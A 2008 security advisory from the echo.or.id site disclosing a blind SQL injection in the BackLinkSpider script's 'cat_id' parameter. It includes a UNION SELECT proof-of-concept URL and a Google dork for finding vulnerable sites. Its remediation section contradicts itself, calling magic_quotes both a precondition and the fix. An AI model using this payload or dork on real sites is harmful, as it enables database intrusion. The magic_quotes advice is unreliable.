Home · Echo.or.id · Ezine · FAQ · Discussion Forum · Photo Gallery · Contact Us · Advisories · Event · Mailing List Thursday, February 22, 2018
Navigation
Home
Todays Events
Contact Us
Search
News Categories
Advisories
Hardware
Journal
Network
Echo News
Security
Software
Public Poll
Why did you wanna be a hacker?

they`re wearing a hat

its on my blood, dude

my mom told me too

knowledge its delicious

they type faster

no idea, who am i ?

Friendly Links
+ Aikmel.or.id
+ id-ubuntu
+ udaramaya.com
+ kecoak-elektronik
+ newhack.org
+ Opensource.id
+ Jasakom.com
+ Konsultan Linux
+ w[X]f project
+ klik-kanan.com
+ hyem.org
+ ilmuwebsite.com
+ y3dips blogs

Security Links
+ Phrack Magazine
+ The hacker`s choice
+ TESO team archive
+ Phenoelit
+ WarAxe
+ milw0rm
+ Insecure
+ Planet Web Security
+ Metasploit framework
+ Uninformed journal
+ Security tools
+ PacketStorm Security
+ Hack in the Box
+ DefCon
Users Online
Guests Online: 1
No Members Online

Registered Members: 7
Newest Member: K-159
Echo Badges
Echo.or.id

Echo.or.id
IRC Channel
Join our IRC channel at irc.dal.net/e-c-h-o
[ECHO_ADV_95$2008] BackLinkSpider (cat_id) Blind Sql Injection Vulnerability
AdvisoriesAuthor : M.Hasran Addahroni
Date : May, 5 th 2008
Location : Jakarta, Indonesia
Web : http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : BackLinkSpider
version : unknown
Vendor : http://www.backlinkspider.com/
Description :

BackLinkSpider is a free link exchange service designed to provide you with
access to a growing number of link exchange partners in our link directory page
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "cat_id" parameter in backlinkspider's page is not
properly verified before being used to sql query.
This can be exploited to execute sql query through the browser.
Successful exploitation requires that "magic_quotes" is enabled.


Poc/Exploit:

~~~~~~~~~~
http://www.target.com/[backlinkspider_page_name].php?cat_id=[SQL]
http://www.target.com/[backlinkspider_page_name].php?cat_id=-1%20union%20\
select%201,2,3,4,5,6,7,8,9,0,1,version(),3,4,5,6,7,8,9,0/*


Dork:
~~~~~
Google : "Powered By BackLinkSpider" "inurl:backlinkspider.php"


Solution:
~~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini


Timeline:
~~~~~~~~~

- 03 - 05 - 2008 bug found
- 05 - 05 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zautha my little angel, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az01,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank
,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,kuntua,
stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------
Staff Login
Username

Password



Top 10 News
idsecconf 2011 Palembang -- Call of paper 65535
Press Release IDSECCONF2010 65535
HITZ4 : "WIMAX, Are U Ready?" 65535
OPENBSD dibackdoor FBI sejak tahun 2000 65535
Hack In The Zoo - Online Class #1 65535
ECHO Gathering - Hack In The Zoo 5 - Bandung 65535
[Poltek Telkom] Student Creativity Contest 2011 - Open Mind IT Security Seminar 65535
SharePoint vulnerable terhadap POET Attacks, Microsoft Keluarkan Security Advisory 65535
[ECHO_ADV_113$2010] BSI Hotel Booking System Admin Login Bypass Vulnerability 65535
Selamat Hari Lahir ECHO yang ke-8 61508
Top 5 News Posters
y3dips 91
K-159 45
az001 20
echostaff 14
pushm0v 3
Event Calendar
February 2018
S M T W T F S
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28      
Echo T-Shirt
t-shirt
Echo Misc



Google
newbie_hacker
Visit this group

Add


Quotes
"In the end, we will remember not the words of our enemies, but the silence of our friends."(Martin Luther King)
Echo Book
y3dips
Copyleft !© echo.inc 2003-2012